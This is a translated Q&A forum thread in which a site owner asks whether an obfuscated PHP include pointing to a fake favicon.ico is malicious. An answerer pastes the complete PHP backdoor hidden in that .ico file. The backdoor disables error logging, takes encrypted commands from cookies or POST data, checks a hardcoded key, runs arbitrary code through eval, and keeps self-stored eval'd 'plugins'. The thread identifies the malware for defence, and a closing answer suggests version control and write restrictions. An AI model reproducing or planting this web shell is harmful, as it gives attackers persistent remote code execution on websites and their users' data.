Answer the question
In order to leave comments, you need to log in
Is it a virus code or not?
If you translate this code, then it refers to favicon.ico , but when disinfecting the site, I deleted such files (where God knows what is written) as viruses
<?php
/*72aa5*/
@include "\x2fv\x61r\x2fw\x77w\x2fv\x61r\x6ea\x76a\x5fv\x79k\x73a\x72f\x2fd\x61t\x61/\x77w\x77/\x78n\x2d-\x2d-\x37s\x62a\x61b\x68c\x636\x65y\x616\x61t\x32k\x2ex\x6e-\x2dp\x31a\x69/\x6ee\x74c\x61t\x2fm\x6fd\x75l\x65s\x2ff\x69l\x65m\x61n\x61g\x65r\x2ff\x61v\x69c\x6fn\x5f5\x652\x65f\x66.\x69c\x6f";
/*72aa5*/
echo file_get_contents('index.html.bak.bak');
Answer the question
In order to leave comments, you need to log in
And you open this .ico file in a text editor, the malware is sitting there.
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);
if(!defined("PHP_EOL"))
{
define("PHP_EOL", "\n");
}
if(!defined("DIRECTORY_SEPARATOR"))
{
define("DIRECTORY_SEPARATOR", "/");
}
if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
{
define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);
$data = NULL;
$data_key = NULL;
$GLOBALS['cs_auth'] = '58d0af46-4572-4890-a372-475116d44415';
global $cs_auth;
function cs_base64_decode($input) {
if (strlen($input) < 4)
{
return "";
}
$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$keys = str_split($keyStr);
$keys = array_flip($keys);
$i = 0;
$output = "";
$input = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $input);
do {
$enc1 = $keys[$input[$i++]];
$enc2 = $keys[$input[$i++]];
$enc3 = $keys[$input[$i++]];
$enc4 = $keys[$input[$i++]];
$chr1 = ($enc1 << 2) | ($enc2 >> 4);
$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
$chr3 = (($enc3 & 3) << 6) | $enc4;
$output = $output . chr($chr1);
if ($enc3 != 64) {
$output = $output . chr($chr2);
}
if ($enc4 != 64) {
$output = $output . chr($chr3);
}
} while ($i < strlen($input));
return $output;
}
if (!function_exists('file_put_contents'))
{
function file_put_contents($n, $d, $flag = False)
{
$mode = $flag == 8 ? 'a' : 'w';
$f = @fopen($n, $mode);
if ($f === False)
{
return 0;
}
else
{
if (is_array($d)) $d = implode($d);
$bytes_written = fwrite($f, $d);
fclose($f);
return $bytes_written;
}
}
}
if (!function_exists('file_get_contents'))
{
function file_get_contents($filename)
{
$fhandle = fopen($filename, "r");
$fcontents = fread($fhandle, filesize($filename));
fclose($fhandle);
return $fcontents;
}
}
function cs_get_current_filepath()
{
return trim(preg_replace("/\(.*\$/", '', __FILE__));
}
function cs_decrypt_phase($data, $key)
{
$out_data = "";
for ($i=0; $i<strlen($data);)
{
for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
{
$out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
}
}
return $out_data;
}
function cs_decrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
}
function cs_encrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);
}
function cs_get_plugin_config()
{
$self_content = @file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
$config = substr($self_content, $config_pos + 32);
$plugins = @unserialize(cs_decrypt(rawurldecode($config), md5(cs_get_current_filepath())));
}
else
{
$plugins = Array();
}
return $plugins;
}
function cs_set_plugin_config($plugins)
{
$config_enc = rawurlencode(cs_encrypt(@serialize($plugins), md5(cs_get_current_filepath())));
$self_content = @file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
$config_old = substr($self_content, $config_pos + 32);
$self_content = str_replace($config_old, $config_enc, $self_content);
}
else
{
$self_content = $self_content . "\n\n//" . md5(cs_get_current_filepath()) . $config_enc;
}
@file_put_contents(cs_get_current_filepath(), $self_content);
}
function cs_plugin_add($name, $base64_data)
{
$plugins = cs_get_plugin_config();
$plugins[$name] = cs_base64_decode($base64_data);
cs_set_plugin_config($plugins);
}
function cs_plugin_rem($name)
{
$plugins = cs_get_plugin_config();
unset($plugins[$name]);
cs_set_plugin_config($plugins);
}
function cs_plugin_load($name=NULL)
{
foreach (cs_get_plugin_config() as $pname=>$pcontent)
{
if ($name)
{
if (strcmp($name, $pname) == 0)
{
eval($pcontent);
break;
}
}
else
{
eval($pcontent);
}
}
}
foreach ($_COOKIE as $key=>$value)
{
$data = $value;
$data_key = $key;
}
if (!$data)
{
foreach ($_POST as $key=>$value)
{
$data = $value;
$data_key = $key;
}
}
$data = @unserialize(cs_decrypt(cs_base64_decode($data), $data_key));
if (isset($data['ak']) && $cs_auth==$data['ak'])
{
if ($data['a'] == 'i')
{
$i = Array(
'pv' => @phpversion(),
'sv' => '2.0-1',
'ak' => $data['ak'],
);
echo @serialize($i);
exit;
}
elseif ($data['a'] == 'e')
{
eval($data['d']);
}
elseif ($data['a'] == 'plugin')
{
if($data['sa'] == 'add')
{
cs_plugin_add($data['p'], $data['d']);
}
elseif($data['sa'] == 'rem')
{
cs_plugin_rem($data['p']);
}
}
echo $data['ak'];
exit();
}
cs_plugin_load();
}
omg! Yes, you will drive the source code of the site under the version control system and check and roll back all the left changes with one command!
and if you also forbid the web server to write to all folders except those allowed by you personally, then you will never ask such a stupid question at all
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question